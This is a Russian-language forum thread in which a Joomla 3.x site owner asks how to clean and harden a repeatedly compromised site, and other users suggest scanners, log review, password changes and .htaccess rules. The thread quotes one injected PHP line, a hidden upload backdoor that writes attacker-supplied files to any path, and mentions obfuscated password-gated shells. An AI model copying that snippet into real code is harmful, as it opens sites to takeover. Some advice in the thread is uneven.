Уязвимость Joomla - Безопасность сайтов на Joomla

Добрый день, проблема такая, в 5х php файлах (loader.php , import.legacy.php, cms.php...) были обнаружены такие строчки:
"if ($_FILES['F1l3']) {move_uploaded_file($_FILES['F1l3']['tmp_name'], $_POST['Name']); echo 'OK'; Exit;}"
после чего сайт перестал работать до их удаления, 3 недели до этого, был похожий случай, так же пофикшен их удалением, в чем проблема, где может быть дыра?
Так же в файле config.php содержится такой код, это нормально?

версия Joomla ? сканером еще поищи вирус/шелл
config.php удали

версия Joomla ? сканером еще поищи вирус/шелл
config.php удали

Версия 3.1, какой сканер посоветуете? config.php удалил

ai-bolit. ПС.. Не люблю доктора

Почистил сайт, но начали появлятся файлы под названиями "config.php" "libraries/joomla/crypt/error.php" "public_html/includes/system.php" "./public_html/images/sampledata/xml.php
.//public_html/images/color/session.php
./public_html/sxd/lang/view.php"
С содержимым по типу config.php в шапке топика, в чем может быть проблема, неужто из за версии движка 3.3.1? Есть ли способы найти проблему и что делать? В логах ничего интересного.

значит внимательно читать access.log и прочие логи, скорей всего где то сидит типа шелл, который это дело и производит
Можно пройтись поиском по всему сайту, поискать где есть вхождение eval
Все расширения на сайте легальны и куплены? Пароли на все (фтп, бд, админ) изменены?

значит внимательно читать access.log и прочие логи, скорей всего где то сидит типа шелл, который это дело и производит
Можно пройтись поиском по всему сайту, поискать где есть вхождение eval
Все расширения на сайте легальны и куплены? Пароли на все (фтп, бд, админ) изменены?

Все легально, все пароли сменили, на eval искал по ftp, много нашёл и удалил, проверил антивирусниками и в ручную, но вчера опять появился новый файл ("libraries/joomla/crypt/error.php"), в котором был вредоносный код, в логах ничего интересного нет.

Встречал еще и такой файл, в начале проверка пароля через $auth_pass , а потом обфусцированный код

Встречал еще и такой файл, в начале проверка пароля через $auth_pass , а потом обфусцированный код

Что в таком случае делать? Обновлять двиг не хочется, да и не уверен что поможет, чистить каждый день от вирусов тоже не вариант, хостинг уже заблокировал почтовые ф-ции аккаунта...

слить все на локаль, еще раз проверить всеми антивирусами и руками на eval и подобное
сменить все логины\пароли, адреса, ipшники, страну проживания

Ну честно, не бывает чудес, либо вы ставили варезное расширение либо у вас в компе вирус, который есть младенцев берет пароли с ftp клиента и все

Что в таком случае делать? Обновлять двиг не хочется, да и не уверен что поможет, чистить каждый день от вирусов тоже не вариант, хостинг уже заблокировал почтовые ф-ции аккаунта...

Если Joomla твоей версии и расширения содержать уязвимость, то нет смысла каждый день чистить.
Можно применить сканер мониторинга файлов, типа Eyesite . Узнать откуда рассылка спама можно, если версия PHP не ниже 5.3, с помощью mail.add_x_header

Если Joomla твоей версии и расширения содержать уязвимость, то нет смысла каждый день чистить.

Простите, что? если расширения содержат уязвимость - нет смысла их искать и чистить?
И что означает "твоей"?

Проверил файлы, нашёл в 30 файлах такой код:
Так же заметил, что все файлы были модифицырованы 08.06 в 1.27
Ацес логи за то время:

Насколько я понял, все началось после ""GET /cache/cwm.php " в самом файле, который я потер только что, лежал огромный eval код, так ли?
За 7 число нашёл логи с файлом cwp.php в котором похожий код:
Что скажете по логам, каким способом вредоносные файлы попали на сайт? Все таки проблема в слитых паролях или каких то уязвимостях?

.htaccess , с запретом на выполнение скриптов, в папку кеш, и желательно еще и в /images

неужто из за версии движка 3.3.1

Да

.htaccess , с запретом на выполнение скриптов, в папку кеш, и желательно еще и в /images

Не думаю что поможет, так как подобная проблема была в других папках, может посоветуете какой то плагин, который заблокирует действия по типу:
"POST /cache/com_jcomments_objects_com_jshopping/plugin.php"

Не думаю что поможет, так как подобная проблема была в других папках, может посоветуете какой то плагин, который заблокирует действия по типу:
"POST /cache/com_jcomments_objects_com_jshopping/plugin.php"

Другие папки тоже надо закрывать, а не только кеш и images

Что скажете по логам, каким способом вредоносные файлы попали на сайт? Все таки проблема в слитых паролях или каких то уязвимостях?

этих логов не достаточно, было бы не плохо посмотреть дату создания и модификации вредоносных файлов и по цепочки отслеживать. Проблемой может быть что угодно, как просто слитые пароли, так и уязвимсоти и не надежность хостера, тут нужно комплексно подходить к решению задачи, грамматно навести профилактические меры, чистку вредоносов, выставить политику логирования, также бы не помешала, какая нить система IDS но такие систему могут нагружать работу CMS.

Другие папки тоже надо закрывать, а не только кеш и images

Закрыл через .htaccess:
Поставил на сайт: Eyesite (Для мониторинга изменений) и Marco's SQL Injection - LFI Interceptor для защиты.
Почистил все файлы, буду надеяться что поможет.

Закрыл через .htaccess:

Спойлер

[свернуть]

Поставил на сайт: Eyesite (Для мониторинга изменений) и Marco's SQL Injection - LFI Interceptor для защиты.
Почистил все файлы, буду надеяться что поможет.

Недостаточно расширений, обходятся легко!, не поможет.